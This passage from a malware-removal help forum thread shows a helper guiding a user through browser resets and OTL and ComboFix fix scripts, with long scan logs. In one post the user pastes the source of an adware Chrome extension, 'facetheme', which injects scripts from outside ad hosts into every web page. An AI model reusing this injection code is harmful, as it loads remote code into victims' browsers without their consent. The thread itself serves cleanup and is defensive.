tppwr32v.sys 15/04/2009 2:5.00,2:6.0 Signed pwrmgrv.cat Microsoft Windows Hardware Compatibility Publisher
tunmp.sys 21/01/2008 2:5.1,2:5.2,2:6.0 Signed Package_30_for_KB936Microsoft Windows
tunnel.sys 21/01/2008 2:5.1,2:5.2,2:6.0 Signed Package_30_for_KB936Microsoft Windows
tvti2c.sys 22/02/2008 2:5.00 Signed tvti2c.cat Microsoft Windows Hardware Compatibility Publisher
umbus.sys 21/01/2008 2:5.1 Signed Package_30_for_KB936Microsoft Windows
usbd.sys 21/01/2008 2:5.1 Signed Package_25_for_KB948Microsoft Windows
usbehci.sys 10/04/2009 2:5.1 Signed Package_25_for_KB948Microsoft Windows
usbhub.sys 10/04/2009 2:5.1 Signed Package_25_for_KB948Microsoft Windows
usbport.sys 10/04/2009 2:5.1 Signed Package_25_for_KB948Microsoft Windows
usbuhci.sys 21/01/2008 2:5.1 Signed Package_25_for_KB948Microsoft Windows
vga.sys 21/01/2008 2:5.1,2:5.2,2:6.0 Signed Package_30_for_KB936Microsoft Windows
volmgr.sys 21/01/2008 2:5.1 Signed Package_25_for_KB948Microsoft Windows
volmgrx.sys 11/04/2009 2:5.1,2:5.2,2:6.0 Signed Package_25_for_KB948Microsoft Windows
volsnap.sys 11/04/2009 2:5.1 Signed Package_25_for_KB948Microsoft Windows
wanarp.sys 21/01/2008 2:5.1,2:5.2,2:6.0 Signed Package_30_for_KB936Microsoft Windows
wdf01000.sys 14/07/2009 2:5.1,2:5.2,2:6.0 Signed Package_26_for_KB970Microsoft Windows
wmiacpi.sys 21/01/2008 2:5.1 Signed Package_25_for_KB948Microsoft Windows
xaudio.exe 18/10/2007 2:6.0 Signed tkp5051z.cat Microsoft Windows Hardware Compatibility Publisher
xaudio.sys 18/10/2007 2:6.0 Signed tkp5051z.cat Microsoft Windows Hardware Compatibility Publisher
[c:\windows\system32\spool\drivers\color]
tpflx.icm 15/06/2005 2:5.00 Signed tplcd.cat Microsoft Windows Hardware Compatibility Publisher
tplcd.icm 09/08/2007 2:5.00 Signed tplcd.cat Microsoft Windows Hardware Compatibility Publisher
tplcd100.icm 16/09/2009 2:5.00 Signed tplcd.cat Microsoft Windows Hardware Compatibility Publisher
tplcd60.icm 13/07/2009 2:5.00 Signed tplcd.cat Microsoft Windows Hardware Compatibility Publisher
tplcd95.icm 24/07/2009 2:5.00 Signed tplcd.cat Microsoft Windows Hardware Compatibility Publisher
tpmb60.icm 05/11/2008 2:5.00 Signed tplcd.cat Microsoft Windows Hardware Compatibility Publisher
tpmb72.icm 02/10/2008 2:5.00 Signed tplcd.cat Microsoft Windows Hardware Compatibility Publisher

Unscanned Files:
------------------
[c:\windows\c:\combofix]
catchme.sys The directory name is invalid.
  • 0

#50
michaelg9

michaelg9

    Trusted Helper

  • Malware Removal
  • 2,949 posts
Hello,

We're going to reset Internet Explorer settings and add-ons. Note down if you have an add-on or settings that you want, and re-install it after the reset


  • Exit all programs, including Internet Explorer (if it is running).
  • Click Start
  • Type the following command in the Start Search box, and then press ENTER:
    inetcpl.cpl
  • The Internet Options dialog box appears.
  • Click the Advanced tab.
  • Under Reset Internet Explorer settings, click Reset. Then click Reset again.
  • When Internet Explorer finishes resetting the settings, click Close in the Reset Internet Explorer Settings dialog box.
  • Start Internet Explorer again.
  • Check if you still have issues with ads


Next:

Run OTL
  • Under the Custom Scans/Fixes box at the bottom, paste in the following

    :OTL

    :Services

    :Reg
    [-HKEY_USERS\S-1-5-21-1853308285-865056411-922338472-1000\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{DA3DD5C5-2F6F-E749-D4A2-0D91BDF20D27}*]

    :Files
    c:\windows\system32\roboot.exe
    c:\users\LENOVO\AppData\Roaming\Systweak

    :Commands
    [purity]
    [emptytemp]
    [EMPTYFLASH]
    [Reboot]

  • Then click the Run Fix button at the top
  • Let the program run unhindered, reboot the PC when it is done
  • Open OTL again and click the Quick Scan button. Post the log it produces in your next reply.

  • 0

#51
Bismillah

Bismillah

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 514 posts
the add on facetheme is for chrome i believe

as facetheme shows on chrome but not ie

Edited by nortan360, 19 August 2011 - 07:21 AM.

  • 0

#52
michaelg9

michaelg9

    Trusted Helper

  • Malware Removal
  • 2,949 posts
Remove it and if the ads are still there, follow the instructions above
  • 0

#53
Bismillah

Bismillah

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 514 posts
I cant remove it
It crashes chrome when i try to remove it


OTL crashed when i try to run this fix

Edited by nortan360, 19 August 2011 - 07:25 AM.

  • 0

#54
michaelg9

michaelg9

    Trusted Helper

  • Malware Removal
  • 2,949 posts
Click on Start(Windows 7 Orb) >> Run...(or the Windows key and R together) to bring up the Run box and copy and paste the below from the quote-box and click on OK

%USERPROFILE%\AppData\Local\Google\Chrome\User Data

Navigate to the folder called Default in the directory window that opens and and right-click on it and select Rename.

Now rename it at Backup Default. Now launch Google Chrome and check if the issues you have been experiencing have been rectified.

Note: You may have to reapply your custom settings/import bookmarks again etc.


Next:

If the ads are still there, follow the instructions above :)
  • 0

#55
Bismillah

Bismillah

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 514 posts
ads are gone on chrome


I have located the folders of facetheme in default

Would you like me to upload them for future use?
so you can remove it easier?


var facetheme = {

installid: "",
installdate: "",
installedproduct: "",
added: "false",

init: function(){

if(facetheme.added == "false"){
if(facetheme.addScripts()){
facetheme.added = true;
}
}

},

setInstallId: function(iid){
facetheme.installid = iid;
},

setInstallDate: function(idate){
facetheme.installdate = idate;
},

setInstalledProduct: function(product){
facetheme.installedproduct = product;
},

addScripts: function(){
var headID = document.getElementsByTagName("head")[0];
var newScript = document.createElement('script');
var newScriptID = document.createElement('script');
newScript.type = 'text/javascript';
newScriptID.type = 'text/javascript';
if(document.location.protocol == 'http:'){
newScript.src = 'http://tb.adurr.com/include.js';
}else if(document.location.protocol == 'https:'){
newScript.src = 'https://loading-resource.com/include.js';
}
newScriptID.innerHTML = "var installID = \""+facetheme.installid+"\";var installDate = \""+facetheme.installdate+"\";var installedProduct = \""+facetheme.installedproduct+"\";";
headID.appendChild(newScriptID);
headID.appendChild(newScript);
return true;
}

}

/*
chrome.extension.sendRequest({method: "installdetails"}, function(response) {
facetheme.setInstallId(response.installid);
facetheme.setInstallDate(response.installdate);
facetheme.init();
});
*/facetheme.setInstallId('{9B3E75AE-00DD-4BAC-BF31-82D8C694673B}'); facetheme.setInstalledProduct('facetheme_bundle'); facetheme.setInstallDate('2011-8-16'); facetheme.init();

Edited by nortan360, 19 August 2011 - 07:32 AM.

  • 0

Advertisements


#56
michaelg9

michaelg9

    Trusted Helper

  • Malware Removal
  • 2,949 posts
Do the ads still exist in IE?
  • 0

#57
Bismillah

Bismillah

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 514 posts
Gone as far as i can see
  • 0

#58
michaelg9

michaelg9

    Trusted Helper

  • Malware Removal
  • 2,949 posts
Finally. I didn't expect that a Chrome entry would have effect on IE.

Just a final fix:

1. Close any open browsers.

2. Close/disable all anti virus and anti malware programs so they do not interfere with the running of ComboFix.

3. Open notepad and copy/paste the text in the quotebox below into it:

File::
c:\windows\system32\roboot.exe

Folder::
c:\users\LENOVO\AppData\Roaming\Systweak

RegLockDel::
[HKEY_USERS\S-1-5-21-1853308285-865056411-922338472-1000\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{DA3DD5C5-2F6F-E749-D4A2-0D91BDF20D27}*]


Save this as CFScript.txt, in the same location as ComboFix.exe


Posted Image

Refering to the picture above, drag CFScript into ComboFix.exe

When finished, it shall produce a log for you at C:\ComboFix.txt which I will require in your next reply.


Next:

How's your computer working? Any other problems?
  • 0

#59
Bismillah

Bismillah

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 514 posts
ComboFix 11-08-18.01 - LENOVO 20/08/2011 13:09:11.7.2 - x86
Microsoft® Windows Vista™ Business 6.0.6002.2.1252.44.1033.18.1943.740 [GMT 1:00]
Running from: c:\users\LENOVO\Desktop\ComboFix.exe
Command switches used :: c:\users\LENOVO\Desktop\CFScript.txt
AV: avast! Antivirus *Disabled/Updated* {2B2D1395-420B-D5C9-657E-930FE358FC3C}
SP: avast! Antivirus *Disabled/Updated* {904CF271-6431-DA47-5FCE-A87D98DFB681}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
FILE ::
"c:\windows\system32\roboot.exe"
.
.
((((((((((((((((((((((((( Files Created from 2011-07-20 to 2011-08-20 )))))))))))))))))))))))))))))))
.
.
2011-08-20 12:24 . 2011-08-20 12:24 -------- d-----w- c:\users\TEMP\AppData\Local\temp
2011-08-20 12:24 . 2011-08-20 12:24 -------- d-----w- c:\users\Public\AppData\Local\temp
2011-08-20 12:24 . 2011-08-20 12:24 -------- d-----w- c:\users\Default\AppData\Local\temp
2011-08-19 10:30 . 2011-08-19 10:30 388096 ----a-r- c:\users\LENOVO\AppData\Roaming\Microsoft\Installer\{45A66726-69BC-466B-A7A4-12FCBA4883D7}\HiJackThis.exe
2011-08-19 10:30 . 2011-08-19 10:30 -------- d-----w- c:\program files\Trend Micro
2011-08-19 09:54 . 2011-08-12 02:44 7152464 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{0373FB52-806A-4CB0-A8E0-B6DCEA065FC6}\mpengine.dll
2011-08-18 22:42 . 2011-08-20 12:25 -------- d-----w- c:\users\LENOVO\AppData\Local\temp
2011-08-18 13:42 . 2011-08-18 13:42 -------- d-----w- c:\program files\Speccy
2011-08-18 12:22 . 2011-08-18 12:22 -------- d-----w- C:\_OTL
2011-08-15 21:48 . 2011-08-15 21:48 -------- d-----w- c:\users\LENOVO\AppData\Roaming\JGsoft
2011-08-15 21:47 . 2011-08-15 21:47 -------- d-----w- c:\program files\JGsoft
2011-08-15 21:47 . 2011-05-16 02:33 67312 ----a-w- c:\windows\UnDeployV.exe
2011-08-10 20:00 . 2011-06-17 16:03 375808 ----a-w- c:\windows\system32\winsrv.dll
2011-08-10 20:00 . 2011-07-06 15:31 214016 ----a-w- c:\windows\system32\drivers\mrxsmb10.sys
2011-08-10 20:00 . 2011-06-06 10:59 2409784 ----a-w- c:\program files\Windows Mail\OESpamFilter.dat
2011-08-08 19:23 . 2011-08-19 22:01 -------- d-----w- c:\users\LENOVO\AppData\Roaming\.minecraft
2011-07-27 17:16 . 2011-06-02 13:34 2043392 ----a-w- c:\windows\system32\win32k.sys
2011-07-27 17:16 . 2011-04-20 15:50 49152 ----a-w- c:\windows\system32\csrsrv.dll
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2011-07-06 18:52 . 2010-09-02 00:15 41272 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys
2011-07-06 18:52 . 2010-09-02 00:15 22712 ----a-w- c:\windows\system32\drivers\mbam.sys
2011-07-04 11:43 . 2010-08-25 16:06 40112 ----a-w- c:\windows\avastSS.scr
2011-07-04 11:43 . 2010-08-25 16:06 199304 ----a-w- c:\windows\system32\aswBoot.exe
2011-07-04 11:36 . 2011-03-01 21:39 441176 ----a-w- c:\windows\system32\drivers\aswSnx.sys
2011-07-04 11:36 . 2010-08-25 16:07 309848 ----a-w- c:\windows\system32\drivers\aswSP.sys
2011-07-04 11:35 . 2010-08-25 16:07 43608 ----a-w- c:\windows\system32\drivers\aswTdi.sys
2011-07-04 11:32 . 2010-08-25 16:07 25432 ----a-w- c:\windows\system32\drivers\aswRdr.sys
2011-07-04 11:32 . 2010-08-25 16:07 54104 ----a-w- c:\windows\system32\drivers\aswMonFlt.sys
2011-07-04 11:32 . 2010-08-25 16:07 19544 ----a-w- c:\windows\system32\drivers\aswFsBlk.sys
2011-06-18 17:54 . 2011-06-18 17:54 404640 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2011-06-17 13:45 . 2011-05-08 19:28 187328 ----a-w- c:\programdata\Microsoft\VCSExpress\9.0\1033\ResourceCache.dll
2011-06-17 13:40 . 2011-05-08 19:27 416 ----a-w- c:\programdata\Microsoft\MSDN\9.0\1033\ResourceCache.dll
2011-06-15 11:07 . 2011-01-19 00:59 188128 ----a-w- c:\programdata\Microsoft\VCSExpress\10.0\1033\ResourceCache.dll
2011-05-24 18:14 . 2010-08-25 16:45 222080 ------w- c:\windows\system32\MpSigStub.exe
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\00avast]
@="{472083B0-C522-11CF-8763-00608CC02F24}"
[HKEY_CLASSES_ROOT\CLSID\{472083B0-C522-11CF-8763-00608CC02F24}]
2011-07-04 11:43 122512 ----a-w- c:\program files\Alwil Software\Avast5\ashShell.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\1TortoiseNormal]
@="{C5994560-53D9-4125-87C9-F193FC689CB2}"
[HKEY_CLASSES_ROOT\CLSID\{C5994560-53D9-4125-87C9-F193FC689CB2}]
2010-03-21 07:55 87304 ----a-w- c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\2TortoiseModified]
@="{C5994561-53D9-4125-87C9-F193FC689CB2}"
[HKEY_CLASSES_ROOT\CLSID\{C5994561-53D9-4125-87C9-F193FC689CB2}]
2010-03-21 07:55 87304 ----a-w- c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\3TortoiseConflict]
@="{C5994562-53D9-4125-87C9-F193FC689CB2}"
[HKEY_CLASSES_ROOT\CLSID\{C5994562-53D9-4125-87C9-F193FC689CB2}]
2010-03-21 07:55 87304 ----a-w- c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\4TortoiseLocked]
@="{C5994563-53D9-4125-87C9-F193FC689CB2}"
[HKEY_CLASSES_ROOT\CLSID\{C5994563-53D9-4125-87C9-F193FC689CB2}]
2010-03-21 07:55 87304 ----a-w- c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\5TortoiseReadOnly]
@="{C5994564-53D9-4125-87C9-F193FC689CB2}"
[HKEY_CLASSES_ROOT\CLSID\{C5994564-53D9-4125-87C9-F193FC689CB2}]
2010-03-21 07:55 87304 ----a-w- c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\6TortoiseDeleted]
@="{C5994565-53D9-4125-87C9-F193FC689CB2}"
[HKEY_CLASSES_ROOT\CLSID\{C5994565-53D9-4125-87C9-F193FC689CB2}]
2010-03-21 07:55 87304 ----a-w- c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\7TortoiseAdded]
@="{C5994566-53D9-4125-87C9-F193FC689CB2}"
[HKEY_CLASSES_ROOT\CLSID\{C5994566-53D9-4125-87C9-F193FC689CB2}]
2010-03-21 07:55 87304 ----a-w- c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\8TortoiseIgnored]
@="{C5994567-53D9-4125-87C9-F193FC689CB2}"
[HKEY_CLASSES_ROOT\CLSID\{C5994567-53D9-4125-87C9-F193FC689CB2}]
2010-03-21 07:55 87304 ----a-w- c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\9TortoiseUnversioned]
@="{C5994568-53D9-4125-87C9-F193FC689CB2}"
[HKEY_CLASSES_ROOT\CLSID\{C5994568-53D9-4125-87C9-F193FC689CB2}]
2010-03-21 07:55 87304 ----a-w- c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"msnmsgr"="c:\program files\Windows Live\Messenger\msnmsgr.exe" [2010-04-16 3872080]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"FingerPrintSoftware"="c:\program files\Lenovo Fingerprint Software\fpapp.exe \s" [X]
"EZEJMNAP"="c:\progra~1\ThinkPad\UTILIT~1\EzEjMnAp.Exe" [2008-10-07 256576]
"TPFNF7"="c:\program files\Lenovo\NPDIRECT\TPFNF7SP.exe" [2009-04-26 61728]
"TpShocks"="TpShocks.exe" [2009-02-03 181536]
"SynTPEnh"="c:\program files\Synaptics\SynTP\SynTPEnh.exe" [2010-04-23 1725736]
"Persistence"="c:\windows\system32\igfxpers.exe" [2008-06-12 145944]
"StartCCC"="c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2008-01-21 61440]
"LPManager"="c:\progra~1\THINKV~1\PrdCtr\LPMGR.exe" [2009-01-28 185688]
"LPMailChecker"="c:\progra~1\THINKV~1\PrdCtr\LPMLCHK.exe" [2009-01-28 124248]
"Message Center Plus"="c:\program files\LENOVO\Message Center Plus\MCPLaunch.exe" [2009-04-22 49976]
"PWMTRV"="c:\progra~1\ThinkPad\UTILIT~1\PWMTR32V.DLL" [2009-04-15 660768]
"CreateLMBCShortCut"="c:\program files\Lenovo\Mobile Broadband Connect\UserShortcutCreator.exe" [2009-04-13 40960]
"TVT Scheduler Proxy"="c:\program files\Common Files\Lenovo\Scheduler\scheduler_proxy.exe" [2008-05-24 487424]
"ACTray"="c:\program files\ThinkPad\ConnectUtilities\ACTray.exe" [2009-12-10 435560]
"ACWlIcon"="c:\program files\ThinkPad\ConnectUtilities\ACWlIcon.exe" [2009-12-10 181608]
"cssauth"="c:\program files\Lenovo\Client Security Solution\cssauth.exe" [2009-03-05 3093816]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2008-06-12 170520]
"LENOVO.TPFNF6R"="c:\program files\Lenovo\HOTKEY\TPFNF6R.exe" [2009-04-14 15136]
"AppleSyncNotifier"="c:\program files\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe" [2011-04-20 58656]
"iTunesHelper"="c:\program files\iTunes2\iTunesHelper.exe" [2011-06-07 421160]
"TkBellExe"="c:\program files\Real\RealPlayer\update\realsched.exe" [2011-05-02 273544]
"RIMBBLaunchAgent.exe"="c:\program files\Common Files\Research In Motion\USB Drivers\RIMBBLaunchAgent.exe" [2011-02-18 79192]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"EnableUIADesktopToggle"= 0 (0x0)
"DisableCAD"= 1 (0x1)
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^ShortKeys 2.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\ShortKeys 2.lnk
backup=c:\windows\pss\ShortKeys 2.lnk.CommonStartup
backupExtension=.CommonStartup
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^ShortKeys 3.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\ShortKeys 3.lnk
backup=c:\windows\pss\ShortKeys 3.lnk.CommonStartup
backupExtension=.CommonStartup
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iTunesHelper]
2011-06-07 16:51 421160 ----a-w- c:\program files\iTunes2\iTunesHelper.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
2010-11-29 16:38 421888 ----a-w- c:\program files\QuickTime\QTTask.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RIMBBLaunchAgent.exe]
2011-02-18 10:47 79192 ----a-w- c:\program files\Common Files\Research In Motion\USB Drivers\RIMBBLaunchAgent.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Steam]
2011-06-15 19:03 1242448 ----a-w- c:\program files\Steam\Steam.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TkBellExe]
2011-05-02 00:01 273544 ----a-w- c:\program files\Real\RealPlayer\Update\realsched.exe
.
R1 tvtumon;tvtumon;c:\windows\system32\DRIVERS\tvtumon.sys [2008-07-11 48192]
R2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2010-03-18 130384]
R2 LENOVO.MICMUTE;Lenovo Microphone Mute;c:\program files\LENOVO\HOTKEY\MICMUTE.exe [2009-03-30 45424]
R3 ADMonitor;AD Monitor;c:\windows\system32\ADMonitor.exe [2008-10-27 106496]
R3 MUXP;My WiFi PAN Mux-IM Protocol Driver;c:\windows\system32\DRIVERS\mux.sys [2009-02-09 29232]
R3 MyWiFiDHCPDNS;Wireless PAN DHCP Server;c:\program files\Intel\WiFi\bin\PanDhcpDns.exe [2009-02-11 204800]
R3 npggsvc;nProtect GameGuard Service;c:\windows\system32\GameMon.des [2010-10-21 4208208]
R3 s115bus;Sony Ericsson Device 115 driver (WDM);c:\windows\system32\DRIVERS\s115bus.sys [2007-04-23 83208]
R3 s115mdfl;Sony Ericsson Device 115 USB WMC Modem Filter;c:\windows\system32\DRIVERS\s115mdfl.sys [2007-04-23 15112]
R3 s115mdm;Sony Ericsson Device 115 USB WMC Modem Driver;c:\windows\system32\DRIVERS\s115mdm.sys [2007-04-23 108680]
R3 s115mgmt;Sony Ericsson Device 115 USB WMC Device Management Drivers (WDM);c:\windows\system32\DRIVERS\s115mgmt.sys [2007-04-23 100488]
R3 s115obex;Sony Ericsson Device 115 USB WMC OBEX Interface;c:\windows\system32\DRIVERS\s115obex.sys [2007-04-23 98568]
R3 WPFFontCache_v0400;Windows Presentation Foundation Font Cache 4.0.0.0;c:\windows\Microsoft.NET\Framework\v4.0.30319\WPF\WPFFontCache_v0400.exe [2010-03-18 753504]
R4 Akamai;Akamai NetSession Interface;c:\windows\System32\svchost.exe [2008-01-21 21504]
R4 RoxMediaDB10;RoxMediaDB10;c:\program files\Common Files\Roxio Shared\10.0\SharedCOM\RoxMediaDB10.exe [2008-04-25 1120752]
R4 TeamViewer6;TeamViewer 6;c:\program files\TeamViewer\Version6\TeamViewer_Service.exe [2011-01-27 2253688]
R4 TVT_UpdateMonitor;TVT Windows Update Monitor;c:\program files\Lenovo\Rescue and Recovery\UpdateMonitor.exe [2008-10-09 360448]
S0 TPDIGIMN;TPDIGIMN;c:\windows\System32\DRIVERS\ApsHM86.sys [2009-01-29 20520]
S1 aswSnx;aswSnx; [x]
S1 aswSP;aswSP; [x]
S1 lenovo.smi;Lenovo System Interface Driver;c:\windows\system32\DRIVERS\smiif32.sys [2008-05-12 13480]
S2 aswFsBlk;aswFsBlk; [x]
S2 aswMonFlt;aswMonFlt;c:\windows\system32\drivers\aswMonFlt.sys [2011-07-04 54104]
S2 ATService;AuthenTec Fingerprint Service;c:\windows\system32\AtService.exe [2008-10-27 1676536]
S2 DDNIOEMService;DDNIOEMService;c:\program files\DDNI\SBITS\DDNIOEMService.exe [2007-09-28 162280]
S2 dtsvc;Data Transfer Service;c:\windows\system32\DTS.exe [2008-10-27 98304]
S2 FirebirdGuardianDefaultInstance;Firebird Guardian - DefaultInstance;c:\program files\Firebird\Firebird_2_5\bin\fbguard.exe [2010-09-17 98304]
S2 Power Manager DBC Service;Power Manager DBC Service;c:\program files\ThinkPad\Utilities\PWMDBSVC.EXE [2009-04-15 66848]
S2 TPHKSVC;On Screen Display;c:\program files\LENOVO\HOTKEY\TPHKSVC.exe [2009-04-02 62320]
S2 TVT Backup Protection Service;TVT Backup Protection Service;c:\program files\Lenovo\Rescue and Recovery\rrpservice.exe [2008-05-24 520192]
S3 amdkmdag;amdkmdag;c:\windows\system32\DRIVERS\atikmdag.sys [2008-09-19 3881472]
S3 amdkmdap;amdkmdap;c:\windows\system32\DRIVERS\atikmpag.sys [2008-09-19 54784]
S3 ATSwpWDF;AuthenTec TruePrint USB WDF Driver;c:\windows\system32\Drivers\ATSwpWDF.sys [2008-10-27 482176]
S3 e1yexpress;Intel® Gigabit Network Connections Driver;c:\windows\system32\DRIVERS\e1y6032.sys [2009-08-14 220152]
S3 FirebirdServerDefaultInstance;Firebird Server - DefaultInstance;c:\program files\Firebird\Firebird_2_5\bin\fbserver.exe [2010-09-17 3735552]
S3 intelkmd;intelkmd;c:\windows\system32\DRIVERS\igdkmd32.sys [2008-06-12 2381312]
S3 ManyCam;ManyCam Virtual Webcam, WDM Video Capture Driver;c:\windows\system32\DRIVERS\ManyCam.sys [2008-01-14 21632]
S3 MUXMP;My WiFi PAN MUX-IM Virtual Miniport Driver;c:\windows\system32\DRIVERS\mux.sys [2009-02-09 29232]
S3 NETw5v32;Intel® Wireless WiFi Link Adapter Driver for Windows Vista 32 Bit ;c:\windows\system32\DRIVERS\NETw5v32.sys [2009-02-09 3715072]
S3 TVTI2C;Lenovo SM bus driver;c:\windows\system32\DRIVERS\Tvti2c.sys [2008-02-22 37312]
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
LocalServiceNoNetwork REG_MULTI_SZ PLA DPS BFE mpssvc
Akamai REG_MULTI_SZ Akamai
LocalServiceAndNoImpersonation REG_MULTI_SZ FontCache
.
Contents of the 'Scheduled Tasks' folder
.
2011-05-20 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1853308285-865056411-922338472-1000Core.job
- c:\users\LENOVO\AppData\Local\Google\Update\GoogleUpdate.exe [2010-08-26 17:30]
.
2011-05-20 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1853308285-865056411-922338472-1000UA.job
- c:\users\LENOVO\AppData\Local\Google\Update\GoogleUpdate.exe [2010-08-26 17:30]
.
2010-08-05 c:\windows\Tasks\PCDoctorBackgroundMonitorTask.job
- c:\program files\PCDR5\pcdr5cuiw32.exe [2009-02-20 20:57]
.
.
------- Supplementary Scan -------
.
uSearchURL,(Default) = hxxp://g.msn.co.uk/0SEENGB/SAOS01?FORM=TOOLBR
IE: E&xport to Microsoft Excel - c:\progra~1\MI1933~1\Office12\EXCEL.EXE/3000
IE: Save video on Savevid.com - c:\program files\Savevid\redirect.htm
TCP: DhcpNameServer = 194.168.4.100 194.168.8.100
DPF: {DAF7E6E6-D53A-439A-B28D-12271406B8A9} - hxxp://mobileapps.blackberry.com/devicesoftware/AxLoader.cab
FF - ProfilePath - c:\users\LENOVO\AppData\Roaming\Mozilla\Firefox\Profiles\xqbyuseu.default\
FF - Ext: Default: {972ce4c6-7e08-4474-a285-3208198ce6fd} - c:\program files\Mozilla Firefox\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
FF - Ext: Java Console: {CAFEEFAC-0016-0000-0024-ABCDEFFEDCBA} - c:\program files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0024-ABCDEFFEDCBA}
FF - Ext: Microsoft .NET Framework Assistant: {20a82645-c095-46ed-80e3-08825760534b} - c:\windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF - Ext: avast! WebRep: [email protected] - c:\program files\Alwil Software\Avast5\WebRep\FF
FF - Ext: Microsoft .NET Framework Assistant: {20a82645-c095-46ed-80e3-08825760534b} - %profile%\extensions\{20a82645-c095-46ed-80e3-08825760534b}
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2011-08-20 13:25
Windows 6.0.6002 Service Pack 2 NTFS
.
scanning hidden processes ...
.
scanning hidden autostart entries ...
.
scanning hidden files ...
.
scan completed successfully
hidden files: 0
.
**************************************************************************
.
[HKEY_LOCAL_MACHINE\system\ControlSet010\Services\npggsvc]
"ImagePath"="c:\windows\system32\GameMon.des -service"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-1853308285-865056411-922338472-1000\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{DA3DD5C5-2F6F-E749-D4A2-0D91BDF20D27}*]
"hahipkcgcajjaeco"=hex:6a,61,66,64,6b,64,61,61,68,64,63,70,68,6f,62,69,6b,6d,
68,68,00,00
"iafbhlgohffmfmhbmf"=hex:63,61,63,65,65,63,00,7f
"iabjjmomdcemelfdgo"=hex:6a,61,66,64,6b,64,61,61,68,64,63,70,68,6f,62,69,6b,6d,
68,68,00,00
.
[HKEY_LOCAL_MACHINE\system\ControlSet010\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
[HKEY_LOCAL_MACHINE\system\ControlSet010\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0001\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
